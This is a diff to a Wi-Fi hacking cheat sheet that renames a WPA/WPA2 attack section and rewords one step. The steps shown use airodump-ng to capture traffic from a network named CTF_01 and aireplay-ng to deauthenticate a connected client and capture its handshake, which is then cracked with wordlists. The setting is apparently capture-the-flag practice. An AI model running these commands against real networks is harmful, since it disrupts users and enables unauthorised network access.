trevorbryant/cheatsheets/wifi_hack.md

 ```
 5) Run `aircrack-ng` to obtain the WEP key.

-### WPA/WPA2 PSK with clients
+### WPA/WPA2 PSK with connected client
 Steps to perform an attack on a WPA/WPA2 access point with clients.
 The pre-shared (PSK) must be in the wordlists used.
 There is a bug in versions older than 1.5 where this will fail.

 1) Monitor and capture the target network traffic.
 ```code
 $ airodump-ng wlan0mon -c 6 -e CTF_01 -w capture
 ```
-2) Force the connected client to deauthenticate to capture the PRGA XOR keystream.
+2) Force the connected client to deauthenticate to capture the handshake(s).
 ```code
 $ aireplay-ng -0 3 -e CTF_01 -c client_mac wlan0mon
 ```